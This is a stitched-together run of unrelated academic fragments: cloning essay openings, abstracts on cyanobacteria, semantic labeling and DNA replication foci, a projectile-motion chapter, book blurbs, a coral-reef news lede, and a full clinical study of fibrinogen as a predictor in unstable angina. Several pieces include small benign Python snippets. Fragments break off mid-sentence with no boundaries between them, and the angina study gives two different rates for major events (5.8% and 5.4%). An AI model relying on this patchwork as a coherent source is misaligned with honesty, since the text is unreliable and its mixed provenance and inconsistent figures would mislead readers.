Outside the lab where the cloning had actually taken place, most of us thought it could never happen. Oh we would say that perhaps at some point in the distant future, cloning might become feasible through the use of sophisticated biotechnologies far beyond those available to us now. But what we really believed, deep in our hearts, was that this one biological feat we could never master. Dr. Lee M. Silver, 1997. On February 23, 1997, Doctor Ian Wilmut successfully cloned the world's first mammal
controversial topic of cloning. Cloning is an exact, precise copy of an organism (“Cloning”). Even though cloning provides many benefits, human cloning is not ethical because it will cost a tremendous amount of money and time. Cloning will also destroy evolution, and finally each and every human, even a clone, deserves a sense of individuality. As mentioned earlier, cloning is the copying of an organism that results in identical offspring (“Cloning”). Scientists have tried cloning many times on frogs
be "duplicated." Cloning sheep and other nonhuman animals seemed more ethically benign to some than potentially cloning people. In response to such concerns in the United States, President Clinton signed a five-year moratorium on federal funding for human cloning the same year as Dolly's arrival [source: Lamb]. Human cloning has become one of the most debated topics among people in the world regarding its ethical implications. In past polls by TIME magazine (The Ethics of Cloning, 1998), it was shown
Cloning is the process of making copies of individuals that occur in nature, such as bacteria, insects, plants, invertebrates or vertebrates. The copies are called clones, and they are genetically identical to their original parent. Cloned animals have been developed that are genetically engineered to produce valuable proteins in their milk; these have uses in medicine, and cloning can also save animals from extinction. Cloning would open doors to even more powerful technologies of human genetic information
Moral, Social, and Ethical Implications of Cloning “Clones are organisms that are exact genetic copies. Every single bit of their DNA is identical. Clones can happen naturally—identical twins are just one of many examples. Or they can be made in the lab. Natural identical twins are similar to and different from clones made through modern cloning technologies.” (Genetic Science Learning Center) Cloning has many different aspects; there is the moral, social and ethical aspects of cloning. Along with this
Water and Health
Your body uses water in all its cells, organs, and tissues to help regulate its temperature and maintain other bodily functions.
How many days can a human survive without water? Not many. Water is life, and we all know that; it is one of the first words a child learns. Yet after years of acquaintance with the word, most individuals remain oblivious to the health benefits of drinking water. Today, take some time out to […]
Summary
I. Introduction
II. The cyanobacteria
III. The heterocyst
1. Function and metabolism
2. Heterocyst structure
(a) Overview
(b) The polysaccharide (homogeneous) layer
(c) The glycolipid (laminated) layer
(d) The septum and microplasmodesmata
3. Nitrogen regulation and heterocyst development
4. Heterocyst development
(a) The proheterocyst
(b) Proteolysis associated with heterocyst development
(c) RNA polymerase sigma factors
(d) Developmental regulation of heterocyst cell wall and nitrogenase gene expression
(e) Genome rearrangements associated with heterocyst development
5. Genes essential for heterocyst development
(a) hetR
(b) Protein phosphorylation and the regulation of hetR activity
(c) hetR in nonheterocystous cyanobacteria
(d) Other heterocyst-specific genes
6. Heterocyst spacing
(a) Patterns of heterocyst differentiation
(b) Genes involved in heterocyst spacing
(c) Disruption of heterocyst pattern
7. Filament fragmentation and the regression of developing heterocysts
8. The nature of the heterocyst inhibitor
9. Cell selection during differentiation and pattern formation
(a) Cell division
(b) DNA replication and the cell cycle
(c) Competition
10. Models for heterocyst differentiation and pattern control
IV. The akinete
1. Properties of akinetes
2. Structure, composition and metabolism
3. Relationship to heterocysts
4. Factors that influence akinete differentiation
5. Extracellular signals
6. Akinete germination
7. Genes involved in akinete differentiation
V. Conclusion
Acknowledgements
References
Cyanobacteria are an ancient and morphologically diverse group of photosynthetic prokaryotes. They were the first organisms to evolve oxygenic photosynthesis, and so changed the Earth's atmosphere from anoxic to oxic. As a consequence, many nitrogen-fixing bacteria became confined to suitable anoxic environmental niches, because the enzyme nitrogenase is highly sensitive to oxygen. However, in the cyanobacteria a number of strategies evolved that protected nitrogenase from oxygen, including a temporal separation of oxygenic photosynthesis and nitrogen fixation and, in some filamentous strains, the differentiation of a specialized cell, the heterocyst, which provided a suitable microaerobic environment for the functioning of nitrogenase. The evolution of a spore-like cell, the akinete, almost certainly preceded that of the heterocyst and, indeed, the akinete may have been the ancestor of the heterocyst. Cyanobacteria have the capacity to differentiate several additional cell and filament types, but this review will concentrate on the heterocyst and the akinete, emphasizing the differentiation and spacing of these specialized cells.
Malone 107
Language suggests information about entities and events—real or imagined. We are interested in inferring such information or meaning, such
semantics, from text. In this dissertation, we build upon and contribute to a decompositional view of semantic prediction which is inherently (1) structured—multi-dimensional with correlation and possibly constraints among the possible semantic questions, (2) graded—predicted quantities represent magnitudes or probabilities rather than binary or categorical values, and (3) subjective. Combining these aspects leads to interesting opportunities for modeling and annotation and raises important questions about the impact of these practices. Specifically, we propose the first structured model for the task of Semantic Proto-Role Labeling, casting the structured problem as a multi-label prediction task which we related empirically to semantic role labeling. We subsequently propose mathematical models of structured ordinal prediction that allow us to incorporate graded annotation and to jointly model multiple annotators. We investigate the decompositional semantic prediction task of Situation Frame Identification (a flavor of topic identification) and propose a graded model for the binary task. Finally, we address issues in efficient scalar annotation.
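As a deliberately simplified illustration of what "graded, ordinal" prediction means here, consider the cumulative-link ("ordered logit") form that such models commonly build on. The score and cutpoints below are invented for illustration; this is not the dissertation's actual model:

```python
import math

def sigmoid(x):
    return 1.0 / (1.0 + math.exp(-x))

def ordinal_probs(score, cutpoints):
    """Cumulative-link model over K = len(cutpoints) + 1 ordinal labels:
    P(y <= k) = sigmoid(c_k - score) for increasing cutpoints c_k, so a
    single real-valued score induces a full graded distribution."""
    cumulative = [sigmoid(c - score) for c in cutpoints] + [1.0]
    probs, prev = [], 0.0
    for p in cumulative:
        probs.append(p - prev)
        prev = p
    return probs

# e.g. a 3-way ordinal annotation scale; higher scores shift probability
# mass toward the higher categories
low = ordinal_probs(-2.0, [-1.0, 1.0])
high = ordinal_probs(2.0, [-1.0, 1.0])
```

Jointly modeling multiple annotators could then, for instance, give each annotator their own cutpoints over a shared underlying score.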
Adam Teichert is a PhD candidate in the Center for Language and Speech Processing and an Assistant Professor of Software Engineering at Snow College in Ephraim, UT. Before coming to Johns Hopkins, he received a B.S. in Computer Science from Brigham Young University and a MS in Computing from the University of Utah. His research has explored methods for efficient learning and inference in natural language processing with recent focus on structured models and related methods for decompositional semantic labeling and topic identification.
Benjamin Van Durme
According to the current paradigm, replication foci are discrete sites in the interphase nucleus where assemblies of DNA replication enzymes simultaneously elongate the replication forks of 10-100 adjacent replicons (each approximately 100 kbp). Here we review new results and provide alternative interpretations for old results to show that the current paradigm is in need of further development. In particular, many replicons are larger than previously thought - so large that their complete replication takes much longer (several hours) than the measured average time to complete replication at individual foci (45-60 min). In addition to this large heterogeneity in replicon size, it is now apparent that there is also a corresponding heterogeneity in the size and intensity of individual replication foci. An important property of all replication foci is that they are stable structures that persist, with constant dimensions, during all cell cycle stages including mitosis, and therefore likely represent a fundamental unit of chromatin organization. With this in mind, we present a modified model of replication foci in which many of the foci are composed of clusters of small replicons as previously proposed, but the size and number of replicons per focus is extremely heterogeneous, and a significant proportion of foci are composed of single large replicons. We further speculate that very large replicons may extend over two or more individual foci and that this organization may be important in regulating the replication of such large replicons as the cell proceeds through S-phase.
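The arithmetic behind this timing argument is simple to make explicit. The sketch below assumes bidirectional replication from a central origin and a fork rate of about 1 kbp/min, a commonly cited order-of-magnitude figure for mammalian forks that is an assumption here, not a number from this review:

```python
def replication_time_min(replicon_kbp, fork_rate_kbp_per_min=1.0):
    """Time for two forks diverging from a central origin to finish a replicon:
    each fork copies half the replicon at the given rate."""
    return (replicon_kbp / 2.0) / fork_rate_kbp_per_min

# A typical ~100 kbp replicon finishes in ~50 min, consistent with the
# measured 45-60 min lifetime of individual foci, whereas a 1 Mbp replicon
# would need on the order of eight hours - hence the heterogeneity discussed above.
t_small = replication_time_min(100.0)    # 50.0 min
t_large = replication_time_min(1000.0)   # 500.0 min
```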
One of the most classic and well-known problems in physics is projectile motion. Tossing a ball in the air, we expect to see it move in a familiar arched path. Under ideal conditions assuming constant gravitational acceleration and negligible air resistance, projectile motion is analytically solvable, i.e., its solutions are expressible in closed-form, known functions. Its properties such as the parabolic path are well explained from introductory physics. Free fall discussed in Chapter 2 is a special case of one-dimensional ideal projectile motion, while the general case is three-dimensional.
To describe realistic projectile motion, we need to consider the effects of air resistance, or drag, which can be significant and interesting. However, the inclusion of these effects renders the problem analytically nonsolvable, and no closed-form solutions are known except under limited conditions. Numerically, this presents no particular difficulty for us, given the toolbox and ODE solvers we just developed in Chapter 2. In fact, realistic projectile motion is an ideal case study for us to begin application of these numerical and visualization techniques to this classic problem in this chapter, for it is relatively simple, intuitive, and its basic features are already familiar to us. We will learn to construct models of appropriate degree of complexity to reflect the effects of drag and spin. Furthermore, we will also discuss the ...
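As a sketch of the kind of numerical treatment developed in this chapter, the following uses a generic fourth-order Runge-Kutta step rather than the book's own toolbox; the drag coefficient b2 is per unit mass and its value is purely illustrative:

```python
import math

def rk4_step(f, y, t, h):
    """One classic fourth-order Runge-Kutta step for dy/dt = f(y, t)."""
    k1 = f(y, t)
    k2 = f([yi + 0.5 * h * ki for yi, ki in zip(y, k1)], t + 0.5 * h)
    k3 = f([yi + 0.5 * h * ki for yi, ki in zip(y, k2)], t + 0.5 * h)
    k4 = f([yi + h * ki for yi, ki in zip(y, k3)], t + h)
    return [yi + h * (a + 2 * b + 2 * c + d) / 6.0
            for yi, a, b, c, d in zip(y, k1, k2, k3, k4)]

def projectile_rhs(y, t, b2=0.0, g=9.8):
    """2D projectile with quadratic drag; state y = [x, z, vx, vz].
    Drag acceleration is -b2*|v|*v (per unit mass); b2 = 0 is the ideal case."""
    x, z, vx, vz = y
    v = math.hypot(vx, vz)
    return [vx, vz, -b2 * v * vx, -g - b2 * v * vz]

def horizontal_range(v0, angle_deg, b2=0.0, h=1e-3):
    """Integrate until the projectile returns to z = 0 and return the range."""
    th = math.radians(angle_deg)
    y, t = [0.0, 0.0, v0 * math.cos(th), v0 * math.sin(th)], 0.0
    while True:
        y_new = rk4_step(lambda s, tt: projectile_rhs(s, tt, b2), y, t, h)
        if y_new[1] < 0.0:
            frac = y[1] / (y[1] - y_new[1])   # interpolate to the landing point
            return y[0] + frac * (y_new[0] - y[0])
        y, t = y_new, t + h

# Without drag the computed range reproduces v0**2 * sin(2*theta) / g;
# with drag the range is shorter and the path is no longer a parabola.
```

With b2 = 0 and v0 = 10 m/s at 45 degrees, the result agrees with the analytic range 100/9.8 to within the step size, which is a useful check before turning drag on.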
in: Oxford scholarship online
Scholars commonly take the Declaration of the Rights of Man and Citizen of 1789, written during the French Revolution, as the starting point for the modern conception of human rights. According to the Declaration, the rights of man are held to be universal, at all times and in all places. But as recent crises around migrants and refugees have made obvious, this idea, sacred as it might be among human rights advocates, is exhausted. This book suggests that we need to think of a different idea of universality that exceeds the juridical universalism of the Declaration.
INTRODUCTION
Unstable angina is one of the most frequent reasons for hospital admission, and its course can also be complicated by a high incidence of inpatient cardiac events. Treatment of unstable angina is controversial, raising issues such as whether treatment combining heparin and aspirin is useful,1 the use of low molecular weight heparin,2,3 the use of IIb-IIIa receptor antagonists,4,5 the choice of a conservative vs an interventionist strategy,6-9 and the new humoral prognostic markers.10

The diversity of study design means that comparisons between studies of unstable angina must be performed with caution, particularly with regard to the following points: a) heterogeneity of inclusion criteria, given that some studies do not require the presence of electrocardiographic changes during the chest pain episode to classify it as unstable angina,3,6,11-13 and others include patients with unstable angina and non-Q-wave infarct;1-8,12,14,15 b) heterogeneity of medical treatment, which in many cases is left to the discretion of the treating physician,16 and c) heterogeneity in the indication for cardiac catheterization, which in many cases is also left to the discretion of the treating physician.3,5,12,14,15,17 Given the differences encountered on these points, the frequency of inpatient events shows a certain variability from one series to the next.

Our study includes a homogeneous series of patients with pure unstable angina, excluding patients with non-Q-wave infarct and high-risk patients, and requiring that dynamic changes be evident on electrocardiogram (ECG) during the pain episode for the patient to be included; by using these criteria we attempted to reduce the possibility of including patients with non-coronary chest pain. Antithrombotic treatment consisted of aspirin and enoxaparin, and a conservative strategy was followed with regard to cardiac catheterization. The study aim was to evaluate the frequency of inpatient cardiac events and their predictors.
MATERIAL AND METHODS
Study group
From January 17, 1999 to December 18, 2001, 246 consecutive patients were admitted to our hospital with the diagnosis of unstable angina, according to the following criteria: a) anginous chest pain at rest; b) dynamic electrocardiographic changes during the pain episode; c) normal CK-MB values (acute non-Q-wave myocardial infarct was excluded), and d) no history of acute myocardial infarct in the previous 30 days (post-infarct angina excluded). For inclusion in the study, an ECG recorded during the pain episode had to show signs suggestive of ischemia, such as ST-segment depression or elevation ≥0.1 mV, or T-wave inversion ≥0.1 mV. CK-MB was determined on the patient's arrival in the emergency room and at 8, 12, 18 and 24 hours after onset of pain; in all cases the value was below the upper limit of normal according to our hospital's protocol (CK-MB activity <6% of total CK).
Treatment protocol
Upon admission, all patients received treatment with aspirin, enoxaparin (1 mg/kg/12 hours), intravenous nitroglycerine, and beta-blockers or calcium antagonists. In no case were IIb-IIIa receptor antagonists administered. In patients with ST segment elevation, the elevation resolved rapidly (in less than 20 minutes) with the administration of nitroglycerine, and therefore no patient required fibrinolytic treatment.
Analysis
Forty-eight hours after admission (range, 24 to 72 hours), routine analysis, including fibrinogen analysis, was performed. To determine the fibrinogen level, blood was collected with sodium citrate at a ratio of 1:10. The sample was processed by the clot-formation technique in an automatic coagulometer, and measurements were made by the optical method. The variation coefficient for our laboratory is less than 10%.
Indications for cardiac catheterization
The initial strategy was conservative. Thus, coronary angiography and revascularization (if anatomically possible) were indicated without a previous stress test only in the case of recurrent angina despite medical treatment. Before discharge, patients stabilized with medical treatment underwent a symptom-limited stress test according to the Bruce protocol, and patients with ischemia at Bruce stage I-II were selected to undergo coronary angiography.
Collection of clinical data
Coronary risk factors and a history of ischemic heart disease and cardiac surgery were noted in the clinical history. During hospital admission the following episodes were recorded: a) recurrent angina, defined as recurrent chest pain with transitory ECG changes but without CK-MB elevation; b) the need for cardiac catheterization, and c) a major episode, defined as acute myocardial infarct (recurrent chest pain with CK-MB elevation) or death.
Statistical analysis
Quantitative variables were expressed as mean ± standard deviation (SD) and were compared by the ANOVA test. Qualitative variables were expressed as percentages and were compared by the χ² test. Relative risk (RR) was determined with 95% confidence intervals (CI). The best cut-off points for the quantitative fibrinogen value that predicted the risk of episodes were determined using receiver operating characteristic (ROC) curves. Multivariate analyses were performed by binary logistic regression, including those variables that on univariate analysis showed a value of P<.1; the odds ratio (OR) and 95% CI were calculated.
In all cases P<.05 was considered significant. For statistical analysis, the SPSS 9.0 (Chicago, Illinois) statistical package was used.
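The ROC cut-off selection described above can be sketched in a few lines. This is a toy illustration only, not the study's SPSS procedure: the `best_cutoff` helper and the patient values below are invented, and the rule shown (maximizing Youden's index, sensitivity + specificity - 1) is one common way a "best" cut-off for a continuous marker is chosen.

```python
# Toy sketch of cut-off selection for a continuous marker (fibrinogen, g/L)
# against a binary outcome (recurrent angina). Data are invented.

def best_cutoff(values, outcomes):
    """Return (cutoff, youden) maximizing sensitivity + specificity - 1,
    treating marker >= cutoff as test-positive."""
    best = (None, -1.0)
    pos = sum(outcomes)
    neg = len(outcomes) - pos
    for c in sorted(set(values)):
        tp = sum(1 for v, o in zip(values, outcomes) if v >= c and o)
        tn = sum(1 for v, o in zip(values, outcomes) if v < c and not o)
        youden = tp / pos + tn / neg - 1
        if youden > best[1]:
            best = (c, youden)
    return best

# Invented fibrinogen values and whether recurrent angina occurred.
fib = [3.1, 3.8, 4.2, 4.5, 4.9, 5.3, 5.8, 6.2]
event = [0, 0, 0, 1, 0, 1, 1, 1]

cutoff, youden = best_cutoff(fib, event)
print(cutoff, round(youden, 2))  # 4.5 0.75
```

Applied to a real cohort, the same scan would only return a threshold like the paper's ≥4.5 g/L if the data support it; the toy values here are arranged merely to make the mechanics visible.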
RESULTS
Population characteristics
Table 1 shows the characteristics of the patients included in the study. Mean age was 67±10 years.
The initial ECG changes that justified inclusion in the study were an isolated T-wave inversion in 50 patients (20%) and deviation of the ST segment in 196 (80%): 146 with ST segment depression (60%) and 50 with ST segment elevation (20%).
Episodes during hospital admission
Eighty-eight patients (36%) presented with recurrent angina, and 14 patients (5.8%) with major cardiac events: 8 with non-fatal acute myocardial infarct, and 6 who died. Cardiac catheterization was performed in 142 patients (58%), coronary angioplasty was indicated in 60 patients (24%), and cardiac surgery in 32 patients (13%). One infarct and 1 death occurred following angioplasty, and 2 deaths occurred following surgery; the remaining 10 major episodes occurred before cardiac catheterization. One death occurred in the first 24 hours following admission, before a blood sample could be obtained to determine the fibrinogen level.
Predictors of episodes
Table 2 shows the univariate predictors of recurrent angina. Recurrent angina occurred more frequently in patients with a history of ischemic heart disease (41% vs 31%; P=.1; RR=1.5; 95% CI, 0.9 to 2.6), a history of cardiac surgery (83% vs 33%; P=.001; RR=10.0; 95% CI, 2.1 to 46.7), ST segment deviation (41% vs 14%; P=.0001; RR=4.3; 95% CI, 1.9 to 10.1), and a higher fibrinogen level (5.2±1.8 g/L vs 4.4±1.4 g/L; P=.001; RR=1.4; 95% CI, 1.1 to 1.7). By multivariate analysis (including history of ischemic heart disease, history of heart surgery, ST segment deviation, and fibrinogen level), history of heart surgery (P=.004; OR=22; 95% CI, 3 to 182), ST segment change (P=.01; OR=4.7; 95% CI, 1.4 to 15.9), and fibrinogen level (P=.009; OR=2.4; 95% CI, 1.3 to 4.6) were independent predictors. The area under the ROC curve for the fibrinogen level as a predictor of recurrent angina was 0.63±0.04 (P=.004), and the best cut-off point was a fibrinogen level ≥4.5 g/L (43% vs 26%; P=.02; RR=2.1; 95% CI, 1.2 to 3.9).
Table 3 presents the variables related to the need for cardiac catheterization on univariate analysis. A history of heart surgery (92% vs 56%; P=.02; RR=8.6; 95% CI, 1.1 to 68.3) and a higher fibrinogen level (4.9±1.5 g/L vs 4.3±1.5 g/L; P=.009; RR=1.3; 95% CI, 1.1 to 1.6) significantly increased the probability of the need for cardiac catheterization. On multivariate analysis (including history of heart surgery and increased fibrinogen), a higher fibrinogen level (P=.01; OR=2.1; 95% CI, 1.2 to 3.9) was the only independent predictor. The area under the ROC curve for the fibrinogen level as a predictor of the need for cardiac catheterization was 0.61±0.04 (P=.007), and the best cut-off point was a fibrinogen value ≥4.5 g/L (66% vs 50%; P=.03; RR=2.0; 95% CI, 1.1 to 3.6).
Major events (Table 4) were related only to a higher fibrinogen value (6.7±1.8 g/L vs 4.6±1.5 g/L; P=.001; RR=2.0; 95% CI, 1.4 to 3.1), although there was a non-significant tendency toward more major events in patients with ST segment deviation (6.6% vs 2.0%; P=.2). The area under the ROC curve for fibrinogen as a predictor of a major episode was 0.83±0.07 (P=.001), and the best cut-off point was a fibrinogen value ≥5 g/L (10.8% vs 1.6%; P=.007; RR=7.7; 95% CI, 5 to 38.7).
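A relative risk with its 95% confidence interval, of the kind quoted throughout these results, can be computed from a 2×2 table. This is a hypothetical sketch: the counts are invented, and the CI uses the standard log-RR (Katz) method, which is an assumption since the paper does not state its exact formula.

```python
import math

# Toy relative-risk calculation from a 2x2 table (counts invented).

def relative_risk(a, b, c, d):
    """RR and 95% CI for a 2x2 table:
    a = exposed with event,   b = exposed without event,
    c = unexposed with event, d = unexposed without event.
    CI via the log-RR (Katz) method."""
    rr = (a / (a + b)) / (c / (c + d))
    se = math.sqrt(1 / a - 1 / (a + b) + 1 / c - 1 / (c + d))
    lo = math.exp(math.log(rr) - 1.96 * se)
    hi = math.exp(math.log(rr) + 1.96 * se)
    return rr, lo, hi

rr, lo, hi = relative_risk(30, 40, 15, 50)
print(round(rr, 2), round(lo, 2), round(hi, 2))
```

An RR whose interval excludes 1 (as here) would be read as a statistically significant association at the 5% level.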
Predictive value of fibrinogen
The study group was divided into fibrinogen quartiles (<3.5, 3.5-4.3, 4.4-5.5, >5.6 g/L) (Figure 1). As the fibrinogen level increased, we noted a progressive increase in the rate of recurrent angina (23%, 27%, 30%, and 50%; P=.02; RR of the fourth vs the first quartile=3.3; 95% CI, 1.3 to 8.1; P=.01), the need for catheterization (35%, 58%, 61%, and 66%; P=.02; RR of the fourth vs the first quartile=3.6; 95% CI, 1.5 to 8.5; P=.004), and major episodes (0%, 2.1%, 4.5%, and 12%; P=.04; RR of the fourth vs the first quartile=2.0; 95% CI, 1.6 to 2.4; P=.03).
Fig. 1. Division of the study population into quartiles by fibrinogen values (<3.5, 3.5-4.3, 4.4-5.5, >5.6 g/L). As the fibrinogen level increased, a progressive increase was observed in the rate of recurrent angina (23%, 27%, 30%, and 50%; P=.02; RR of the fourth vs the first quartile=3.3; 95% CI, 1.3 to 8.1; P=.01), the need for catheterization (35%, 58%, 61%, and 66%; P=.02; RR of the fourth vs the first quartile=3.6; 95% CI, 1.5 to 8.5; P=.004), and major episodes (0%, 2.1%, 4.5%, and 12%; P=.04; RR of the fourth vs the first quartile=2.0; 95% CI, 1.6 to 2.4; P=.03).
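The quartile analysis of Figure 1 can be sketched as follows. The helper names and the toy cohort are assumptions for illustration; only the quartile boundaries (<3.5, 3.5-4.3, 4.4-5.5, >5.6 g/L) come from the text.

```python
# Toy sketch: assign patients to the study's fibrinogen quartiles and
# tabulate an event rate per quartile, as in Figure 1. Data are invented.

def quartile(fib_g_per_l):
    """Assign a fibrinogen value (g/L) to quartile 1-4 using the study's cuts."""
    if fib_g_per_l < 3.5:
        return 1
    if fib_g_per_l <= 4.3:
        return 2
    if fib_g_per_l <= 5.5:
        return 3
    return 4

def event_rate_by_quartile(patients):
    """patients: list of (fibrinogen, had_event) pairs -> {quartile: rate}."""
    counts = {q: [0, 0] for q in (1, 2, 3, 4)}  # [events, total]
    for fib, event in patients:
        q = quartile(fib)
        counts[q][0] += int(event)
        counts[q][1] += 1
    return {q: (e / n if n else 0.0) for q, (e, n) in counts.items()}

# Invented cohort for illustration.
cohort = [(3.0, False), (3.2, False), (3.9, False), (4.0, True),
          (4.6, False), (5.0, True), (5.9, True), (6.4, True)]
print(event_rate_by_quartile(cohort))
```

With real data, a monotone rise of the rate across quartiles is the pattern the paper reports for all three endpoints.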
DISCUSSION
The principal findings of our study were as follows: a) the hospital course of patients with unstable angina with dynamic electrocardiographic changes who are initially treated conservatively is complicated by a high rate of cardiac episodes: recurrent angina in 36% of cases, the need for catheterization in 58%, and major episodes in 5.4%; and b) elevation of fibrinogen levels is associated with all unfavorable episodes, while a history of cardiac surgery and deviation of the ST segment during the pain episode are associated with recurrent angina.
Natural history of unstable angina
The natural history of unstable angina varies from one study to another as a function of the inclusion criteria used. Our series analyzed patients with high-risk unstable angina by requiring the presence of dynamic electrocardiographic changes during the pain episode for inclusion in the study. In other studies, documentation of electrocardiographic changes during the episode of chest pain was not a requirement for inclusion;11-14 eliminating this requirement may result in the inclusion of lower-risk patients or of patients with non-coronary chest pain. On the other hand, we excluded patients with non-Q-wave infarct, whereas other series group unstable angina and non-Q-wave infarct together.1-8,15 Although theoretically both entities share the same pathogenesis, consisting of severe coronary stenosis without occlusion and with little or no myocardial necrosis,18-20 a non-Q-wave infarct can produce extensive necrosis even when Q-waves are not observed on the surface ECG, a prognostic implication that is clearly different from that of pure unstable angina without necrosis or with minimal necrosis.
Our finding of a 36% rate of recurrent angina during admission is greater than that reported in other series.1,3,21 Osler et al1 found a rate of 17% for recurrent angina in a meta-analysis of studies of unstable angina or non-Q-wave infarct treated with aspirin and intravenous heparin. In the ESSENCE study,3 the rate of inpatient recurrent angina was 13% in the subgroup treated with aspirin and enoxaparin (the same treatment regimen as in our study). The differences are explained by the inclusion criteria used. Our patient population would thus be particularly exposed to recurrent ischemia, as dynamic electrocardiographic changes without enzyme elevation indicate severe ischemia and a myocardium at risk without necrosis.
In spite of the high incidence of recurrent angina, the frequency of major inpatient episodes was similar to3,15 or lower than1,4,5 that of other series that also included subgroups of patients treated with aspirin and subcutaneous or intravenous heparin. Probably the exclusion of patients with non-Q-wave infarct and post-infarct angina, on one hand, and the availability of a hemodynamic laboratory for urgent catheterization in the case of recurrent angina on the other, would explain this relatively low incidence of major episodes in comparison with the high rate of recurrent angina.
History of heart surgery
Although our study included only 12 patients with a history of heart surgery, this variable was a potent predictor of recurrent angina and of the need for cardiac catheterization: 83% of patients with a history of heart surgery presented with refractory angina and 92% required catheterization. These data suggest the usefulness of a strategy of routine catheterization in cases of unstable angina with a previous aortocoronary graft, although the possibilities of successful revascularization are limited in these patients.22 A history of heart surgery was not related to the occurrence of major episodes, probably because of the limited number of such patients included in our study.
Dynamic ECG changes
The dynamic ECG changes recorded in our study were ST segment depression in 60% of patients, ST segment elevation in 20%, and isolated T-wave inversion in the remaining 20%. Data published in other studies show a greater proportion of T-wave changes. Thus, in the TRIM study,23 in the subgroup presenting with electrocardiographic changes, 29% of patients had ST segment elevation, 18% had ST segment depression, and 53% had T-wave inversion. In the ESSENCE study,3 among the subgroup of patients with electrocardiographic changes treated with enoxaparin, 10% showed ST segment elevation, 33% showed ST segment depression, and 57% showed T-wave changes, although in this study the patient subcategories as a function of ECG were not mutually exclusive.
In our series, changes in the ST segment increased the probability of recurrent angina in comparison with T-wave changes. In series that included 60%23 and 28%24 of patients without electrocardiographic changes, deviation of the ST segment was associated with recurrent ischemia, while T-wave inversion had no predictive value. ST segment changes have also been related to the occurrence of major episodes,25-27 although we found only a tendency that did not reach statistical significance. Two factors could explain this lack of statistical significance: a) the exclusion of patients with non-Q-wave infarct and post-infarct angina, and b) the low rate of major episodes, which limited the statistical power of the analysis of its predictors.
Fibrinogen
An increased fibrinogen level is a predictor of poor prognosis in patients with unstable angina and non-Q-wave myocardial infarct.28-31 The relationship of various risk factors to fibrinogen has been described, such as age, smoking, obesity, a sedentary lifestyle, diabetes, and arterial hypertension.32 Nevertheless, after adjustment for the principal risk factors, fibrinogen remained an independent risk factor for acute myocardial infarction and death in patients with ischemic heart disease.33 In our study, elevation of fibrinogen levels increased the probability of all unfavorable inpatient episodes, independently of coronary risk factors, and was the only variable associated with major cardiac events. Three mechanisms may explain the relationship between fibrinogen and a poor prognosis:29 a) fibrinogen as a marker of a hypercoagulable state that favors coronary thrombosis; b) as an acute-phase reactant reflecting an intense inflammatory reaction in the atheromatous plaque of a coronary vessel, and c) as an acute-phase reactant due to myocardial damage. Given that we excluded patients with non-Q-wave infarct, this last mechanism does not appear to apply in our study.
Clinical implications
Currently, there is controversy regarding whether to follow a conservative or an interventionist strategy in the treatment of patients with unstable angina and non-Q-wave infarct.6-9 In our series, cardiac catheterization was performed in 58% of patients, in spite of an initially conservative treatment strategy. These data suggest that in high-risk unstable angina, defined by dynamic electrocardiographic changes, routine catheterization upon admission may be appropriate, at least for the subgroup of patients with markers of a poor inpatient prognosis: a history of heart surgery, ST segment changes on the initial ECG, and an increased fibrinogen value.
Limitations
When we began our study, troponin testing was not available in our hospital; therefore, patients with non-Q-wave infarct were excluded on the basis of CK-MB values. If a troponin test had been available, some patients might have been classified as having a «microinfarct», or infarct per the new definition of acute myocardial infarct.34 Similarly, the collection of samples for the determination of fibrinogen values was not homogeneous with respect to the time of hospital admission, with a range of 24 to 72 hours from admission to blood extraction.
Correspondence: Dr. J. Sanchis Forés.
Servei de Cardiologia. Hospital Clínic Universitàri. Blasco Ibáñez, 17. 46010 València.España. E-mail: [email protected]
To understand the profound changes in the modes of public political debate over the past decade, this volume develops a new conception of public spheres as spaces of resonance emerging from the power of language to affect and to ascribe and instill collective emotion.
Political discourse is no longer confined to traditional media, but increasingly takes place in fragmented and digital public spheres. At the same time, the modes of political engagement have changed: discourse is said to increasingly rely on strategies of emotionalization and to be deeply affective at its core. This book meticulously shows how public spheres are rooted in the emotional, bodily, and affective dimensions of language, and how language – in its capacity to affect and to be affected – produces those dynamics of affective resonance that characterize contemporary forms of political debate. It brings together scholars from the humanities and social sciences and focuses on two fields of inquiry: publics, politics and media in Part I, and language and artistic inquiry in Part II. The thirteen chapters provide a balanced composition of theoretical and methodological considerations, focusing on highly illustrative case studies and on different artistic practices.
The volume is an indispensable source for researchers and postgraduate students in cultural studies, literary studies, sociology, and political science. It likewise appeals to practitioners seeking to develop an in-depth understanding of affect in contemporary political debate.
1. Introduction: Public Spheres of Resonance – Constellations of Affect and Language
Anne Fleig, Christian von Scheve
2. It’s the Language, stupid!
Kathrin Röggla
Part I: Publics, Politics and Media
3. Affective Publics: Understanding the Dynamic Formation of Public Articulations Beyond the Public Sphere
Margreth Lünenborg
4. Resonant networks
Susanna Paasonen
5. A Sentimental Contract: Ambivalences of Affective Politics and Publics
Brigitte Bargetz
6. Rhythm, gestures and tones in public performances: Political mobilization and affective communication
Britta Timm Knudsen
7. Affective Dynamics of Public Discourse on Religious Recognition in Secular Societies
Christian von Scheve, Robert Walter-Jochum
Part II: Language and Artistic Practice
8. Put A Spell on You: Affect, Language and the Non-Linguistic
Anna Gibbs
9. German 'Sprechtheater' and the Transformation of Theatrical Public Spheres
Friederike Oberkrome, Hans Roth, Matthias Warstat
10. The Alphabet of Feeling Bad: Environmental Installations and Sensory Publics
Ann Cvetkovich
11. Affect and Accent: Public Spheres of Dissonance in the Writing of Yoko Tawada
Marion Acker, Anne Fleig, Matthias Lüthjohann
12. Affect(ive) Assemblages: Literary Worldmaking in Fatma Aydemir’s Ellbogen
Claudia Breger
13. Theory’s Affective Scene: Or, What to Do with Language after Affect
Michael Eng
The Routledge Studies in Affective Societies book series presents high-level academic work on the social dimensions of human affectivity. It aims at shaping, consolidating and promoting a new understanding of societies as Affective Societies, accounting for the fundamental importance of affect and emotion for human coexistence in the mobile and networked worlds of the twenty-first century.
Series Editors:
Birgitt Röttger-Rössler is Professor of Social and Cultural Anthropology at Freie Universität Berlin, Germany [email protected]
Doris Kolesch is Professor of Theater and Performance Studies at Freie Universität Berlin, Germany [email protected]
Editorial Board:
Professor Jan Slaby, Professor Christian von Scheve, Professor Hubert Knoblauch, Dr. Kerstin Schankweiler, Dr. Katharina Metz
Routledge Editor:
Emily Briggs [email protected]
Coral reefs in the deep are ecologically different from those in shallow water
L.A. Rocha/California Academy of Sciences
Deep water reefs are unlikely to be safe harbors for many fish and coral species from shallow reefs threatened by climate change and human activity. Shallow water creatures may have trouble adapting to conditions in the deep, scientists report in the July 20 Science. Plus, deep reefs are facing the same threats that are putting shallower ones at risk.
